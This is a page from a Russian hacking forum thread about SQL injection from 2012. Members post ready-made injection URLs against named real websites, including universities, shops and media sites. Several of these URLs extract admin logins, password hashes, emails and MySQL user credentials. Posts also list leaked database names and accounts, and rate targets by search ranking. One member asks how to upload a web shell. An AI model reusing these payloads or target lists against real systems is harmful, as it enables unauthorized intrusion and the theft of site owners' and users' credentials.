SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 733 of 798
  1. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    Code:
    http://gameleader.ru/showfull.php?gameid=-1262%27+union+select+1,2,3,4,version%28%29,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0--+f
     
    #14641 Faaax, 29 Feb 2012
    3 people like this.
  2. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    The Marian Library.

    Code:
    http://campus.udayton[COLOR=Red].edu[/COLOR]/mary/resources/links/linkdisplay.php3?catnum=1-1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())--
    Database Version: 5.0.41-log
    Database name: marylinks
    User name: mary@localhost

    ТИЦ: 20
    PR: 3

    Официальный сайт коммерческого игрового движка Blitz3D.

    Code:
    http://www.blitzbasic.com/codearcs/codearcs.php?code=1-1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8--
    Database Version: 5.1.56-log
    Database name: blitzbas_db
    User name: blitzbas_bman@localhost

    ТИЦ: 40
    PR: 5
     
    #14642 HellFire, 1 Mar 2012
    Last edited: 1 Mar 2012
    3 people like this.
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.pocketgpsworld.com/sub-menu.php?idCat=9+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+
     
    _________________________
    #14643 yarbabin, 2 Mar 2012
    1 person likes this.
  4. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    http://www.emuanime.cl/tienda.php?id=-77'+union+select+1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+wp_users+--+
    http://www.donaticus-him.ru/view_product.php?id=-7'+union+select+1,2222,3,4,version()+--+

    http://www.clovekvtisni.cz/index2en.php?id=642+and+1=0+union+select+1,concat(email,0x3a,password),3+from+users+--+

    http://shadesoptical.com/blog.php?id=-24+union+select+1,concat(login,0x3a,pass),3,4,5,6,7,8,9+from+shades_optical.users+limit+1,1+--+
     
    #14644 Kusto, 3 Mar 2012
  5. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    http://www.webgari.com/top/siteinfo.php?count=6154%27+union+select+1,2,3,version%28%29,5,6,7,8,9,0,1,2,3,4--+
     
    #14645 Faaax, 5 Mar 2012
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    gomos.org
    Яндекс тИЦ (CY) 10
    Alexa Rank 1,364,524 -85,214
    Google PageRank (PR) 1
     
    #14646 qaz, 5 Mar 2012
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.gavailer.ru/sites/index.php?id_site=-82+/*!union+select+1,2*/
     
    _________________________
    #14647 yarbabin, 5 Mar 2012
    1 person likes this.
  8. bimbim

    bimbim New Member

    Joined:
    24 Sep 2010
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://tv.teletrade.com.ua/index.php?cat=12&subcat=999999.9'+union+all+select+1,concat(0x7e,0x27,unhex(Hex(cast(database()+user()+as+char))),0x27,0x7e),2,3,4,5,6,7+and+'x'='x
    ^^^^^^^^^
    Current User: root@localhost
    Это:
    http://www.teletrade.com.ua/ 275тиц 6pr
    http://masterbrok.com.ua/ 30тиц 4pr
    http://www.dengi-info.com/ 600тиц 4pr
    http://tv.teletrade.com.ua/ 10тиц 3pr

    И plesk бд и mysql included. Наслаждайтесь.

    p.s. а я по таким крутым не лажу... вера не позволяет и skills. стремно.
    p.s.s. буду благодарен за пару ненулевых сайтов с бубликами женской/детской тематики в приват =)
     
    #14648 bimbim, 5 Mar 2012
  9. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Интересный подзапрос.
    Code:
    http://www.hawk.ru/foto_gallery.php?id_gal=-27%20union%20select%200x27,0x2D3120756E696F6E2073656C65637420312C636F6E6361745F777328307833622C646174616261736528292C7573657228292C76657273696F6E2829292C332C342C35202D2D2066%20--%20f
     
    #14649 Boolean, 5 Mar 2012
    2 people like this.
  10. Red[S1]

    Red[S1] Member

    Joined:
    23 Sep 2011
    Messages:
    9
    Likes Received:
    8
    Reputations:
    3
    PR=5

    Code:
    http://www.wallace.edu/student_resources/pathways/news_full_article.htm?id=-1+union+select+1,concat_ws%280x3a,host,user,password%29,3,4,5,6+from+mysql.user--
    DB:
    Code:
    information_schema
administrator_documents
athletic
career_lab
cie
continuing_ed 
deptpages
distance_ed
drupal
form_data
foundations
helpdesk
inventory
joomla
lrc 
maintenance
mediawiki 
messagebord
misrequest 
mysql
offsitelinks
    CY=550 PR=7
    Code:
    http://www.nd.edu/~ccl/news.php?id=-6+union+select+concat_ws%280x3a,database%28%29,user%28%29,version%28%29%29,2,3,4,5+--+
     
    #14650 Red[S1], 5 Mar 2012
  11. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Но комментс

    http://www.flb.ru/index_open.php?info_id=-49931/**//*!union*//**//*!select*//**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+&kpk=1
     
    #14651 Cennarios, 6 Mar 2012
    1 person likes this.
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    _http://www.trooder.com/directory/show.php?id=84015+union+select+1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),0,11,12,13,14,15,16,17,18,19+--+

    _http://smaa-hq.com/bio.php?bioid=-21+union+select+1,2,version(),4,5,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),7,8,99+--+

    _http://www.libonline.ru/index.php?id=833399999999+union+select+1,2,version(),4,5,6,7+--+
     
    _________________________
    #14652 winstrool, 6 Mar 2012
    1 person likes this.
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    pro-kinder.com.ua

    5.1.50
    Яндекс тИЦ (CY) 70
    Google PageRank (PR) 3



    donbazar.ru

    5.1.49-rel11.3-log
    Яндекс тИЦ (CY) 10
    Google PageRank (PR) 1
     
    #14653 qaz, 6 Mar 2012
    Last edited: 6 Mar 2012
    1 person likes this.
  14. Ro Man

    Ro Man Elder - Старейшина

    Joined:
    4 Jun 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    0
    PR 2
    PHP:
    http://masscool.com/category.php?pid=125%20union%20select%201,2,concat_ws%280x3a,@@version,user%28%29,database%28%29%29,4,5,6,7,8--
     
    #14654 Ro Man, 8 Mar 2012
  15. Ro Man

    Ro Man Elder - Старейшина

    Joined:
    4 Jun 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    0
    PR 3
    PHP:
    http://wrigroup.ca/index.php?catid=-183%20UNION%20SELECT%20concat_ws%280x3a,username,password,email,accesslevel%29,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29+from+cfaq_admin
     
    #14655 Ro Man, 8 Mar 2012
    1 person likes this.
  16. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    TIC 350
    PR 5
     
    #14656 kise, 8 Mar 2012
    1 person likes this.
  17. m0m

    m0m Banned

    Joined:
    4 Mar 2012
    Messages:
    85
    Likes Received:
    20
    Reputations:
    0
    [email protected]

    ALBERT@LOCALHOST
     
    #14657 m0m, 8 Mar 2012
    Last edited by a moderator: 9 Mar 2012
  18. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5
    Code:
    http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+15,1
    //для вопросов есть другая тема
     
    #14658 foma9999, 9 Mar 2012
    Last edited by a moderator: 9 Mar 2012
    1 person likes this.
  19. m0m

    m0m Banned

    Joined:
    4 Mar 2012
    Messages:
    85
    Likes Received:
    20
    Reputations:
    0
    links_vvt@localhost


    alexgi_2@localhost

    HAXTA4OK:пости в одном посте
     
    #14659 m0m, 9 Mar 2012
    Last edited by a moderator: 9 Mar 2012
    1 person likes this.
  20. alexoffme

    alexoffme New Member

    Joined:
    30 Sep 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Тиц - 10
    PR - 6

    Кто сможет залить шелл отпишитесь как вы это сделали,если не трудно =) просто ради опыта.
     
    #14660 alexoffme, 9 Mar 2012
(You must log in or sign up to post here.)
Page 733 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.